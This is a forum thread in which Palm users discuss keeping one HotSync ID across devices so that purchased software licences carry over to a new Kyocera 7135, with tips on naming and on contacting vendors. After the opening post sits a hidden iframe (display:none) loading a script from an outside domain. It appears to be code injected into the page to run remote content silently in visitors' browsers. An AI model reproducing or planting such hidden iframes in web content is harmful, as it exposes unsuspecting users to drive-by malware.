+ Reply to Thread

Moving software from old palm without paying for it?

I've noticed several threads where people talk about moving their software from their 6035 or other former Palm device across to their new 7135. Since registering and purchasing Palm software usually requires you to submit your Sync ID, and then the software will ONLY work on that ID, how are you all getting around this issue? I'm asuming you're keeping the same user ID from your old device for the new 7135. I'm just looking ahead to the future before I start purchasing software. My current Hotsync ID is "Kyocera 7135". I guess I should probably change that to "My Palm" or some similar generic ID so that it can apply to any future replacement Palm smartphones I buy?

Thanks for any enlightenment.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think the software writers (and Palm) intended you to use your own name as the Sync ID. Your name most likely won't change... Is there a reason you don't want to do that?

No reason really, other than that I know Hotsync allows you to sync with more than one Palm device. f you have more than one Palm, it makes sense to name each device by the device name rather than by your name. To me, it just seemed more logical at the time when Hotsync asked me to come up with a name to give it the device name rather than my name. But I guess I will have to rename it "Palm Device" or something like that.

Being a "founding" Palm user (1996, was it?), and being totally dependant upon my [Palm Pilot | Palm ? | Handspring | various Palmfones], I've learned creat a unique name for each device, e.g.

Steve Welch (HS)
    Steve Welch (6035)
    Steve Welch (7135)

I haven't found any Palm software authors that won't let me transfer my license to a new device, even after I tell then that there I plan to keep my "old" device around, in case I have to go back to it.

This does involve contacting the vendors, but I don't change devices that often.

St

PS I do keep hotsyncs for my boss on my iBook, and I try to maintain a current hotsync on his laptop, too, in case of disaster. Off site backup, kinda.

Jeremy, I would think you'd only need one hotsync name unless you were had to sync 2 devices on the same machine. Are you using 2, or will you in the future?

I'm just looking ahead. I'm sure that in a year or so I will be buying the latest, greatest Palm Smartphone, and I don't want to have to purchase all the software I purchase now all over again. No, I would not have two Palm devices. I would sell the current one.

Originally posted by Jeremy
    I'm just looking ahead. I'm sure that in a year or so I will be buying the latest, greatest Palm Smartphone, and I don't want to have to purchase all the software I purchase now all over again. No, I would not have two Palm devices. I would sell the current one.
    This was my situation too. I moved from 6035 to 7135. I just continued using my own name. The problem comes only if you have to switch back... Make sure you read the tips posted by others for migrating!

Administrator
    i moved from a 6035 to an i300 to an 1330 and used tha same id for all so you should not have any issues....

Originally posted by KLiuLess
    I think the software writers (and Palm) intended you to use your own name as the Sync ID. Your name most likely won't change... Is there a reason you don't want to do that?
    Witness relocation program? :p
    Please visit my picture site: Robert-O-Rama :)